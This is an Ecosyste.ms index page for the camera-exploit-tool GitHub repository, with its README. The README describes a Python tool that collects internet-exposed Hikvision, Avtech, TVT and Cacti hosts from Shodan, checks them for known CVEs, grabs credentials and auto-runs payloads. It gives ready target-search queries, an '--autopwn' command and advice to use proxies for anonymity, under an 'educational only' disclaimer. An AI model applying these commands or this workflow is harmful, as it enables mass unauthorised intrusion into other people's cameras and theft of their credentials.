Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/TasosY2K/camera-exploit-tool

Automated exploit scanner for cameras on the internet
https://github.com/TasosY2K/camera-exploit-tool

camera camera-exploitation camera-hacking exploit iot scanner shodan vulnerability

Last synced: about 1 month ago
JSON representation

Automated exploit scanner for cameras on the internet

Host: GitHub
URL: https://github.com/TasosY2K/camera-exploit-tool
Owner: TasosY2K
License: gpl-3.0
Created: 2022-12-15T23:14:31.000Z (about 2 years ago)
Default Branch: main
Last Pushed: 2024-03-19T18:47:57.000Z (9 months ago)
Last Synced: 2024-03-19T19:55:29.433Z (9 months ago)
Topics: camera, camera-exploitation, camera-hacking, exploit, iot, scanner, shodan, vulnerability
Language: Python
Homepage: https://blog.tmeletlidis.tech/ilovecameras/
Size: 3.19 MB
Stars: 154
Watchers: 6
Forks: 32
Open Issues: 1
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

awesome-ip-search-engines - Camera Exploit Tool Shodan

README

## Internet Camera Exploitation Tool

This is a tool meant to assist cyber security researchers on discovering outdated and vulnerable camera systems on the internet by utilizing shodan.io

I was able to discover thousands of vulnerable cameras using it

![](/screenshots/Screenshot_20221216_015844.png)

![](/screenshots/Screenshot_20221216_021346.png)

![](/screenshots/Screenshot_20221216_023903.png)

## Vendors Affected

[+] Hikvision

[+] Avtech

[+] TVT

[+] Cacti

more to come...

## Features

- Fetching of hosts from shodan.io
- Check for vulnerable cameras
- Automatically run commands on exploited devices (Only Hikvision for now)
- Automatically grab camera credentials (Only for Avtech)
- Multi-threading for faster scanning
- Usage of Socks5 proxies for anonymity
- Storing results in Sqlite3 database
- Logging all actions in log files

## Prerequisites

To use this tool you need to have the following:
- Shodan API key (Membership required for more than 1 page)
- Socks5 authenticated proxies

## Installation

```
git clone https://github.com/TasosY2K/camera-exploit-tool
pip install -r requirements.txt
python3 scanner.py --help
```

## Usage

##### Collect hosts in database

```
# Collect Hikvision hosts
python3 scanner.py --shodan --api-token --query 'product:"Hikvision IP Camera"' --pages 1

# Collect Avtech hosts
python3 scanner.py --shodan --api-token --query 'linux upnp avtech' --pages 1

# Collect TVT hosts
python3 scanner.py --shodan --api-token --query 'product:"Cross Web Server"' --pages 1

# Collect Cacti hosts
python3 scanner.py --shodan --api-token --query 'Login to Cacti' --pages 1
```

##### Check hosts for exploit

```
python3 scanner.py --check --proxy-file proxies.txt --threads 20
```

##### Automatically run command on exploited hosts

```
python3 scanner.py --autopwn --proxy-file proxies.txt --payload "id"
```

## About this tool

This tool is purely educational and is inteded to make the internet more secure

**I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.**

Any PR's or suggestions on improving this project are welcome

## Exploits Used
[https://www.exploit-db.com/exploits/40500](https://www.exploit-db.com/exploits/40500)

2021-36260 [https://www.exploit-db.com/exploits/50441](https://www.exploit-db.com/exploits/50441)

[https://github.com/k1p0d/h264_dvr_rce](https://github.com/k1p0d/h264_dvr_rce)

CVE-2022-46169 [https://github.com/sAsPeCt488/CVE-2022-46169](https://github.com/sAsPeCt488/CVE-2022-46169)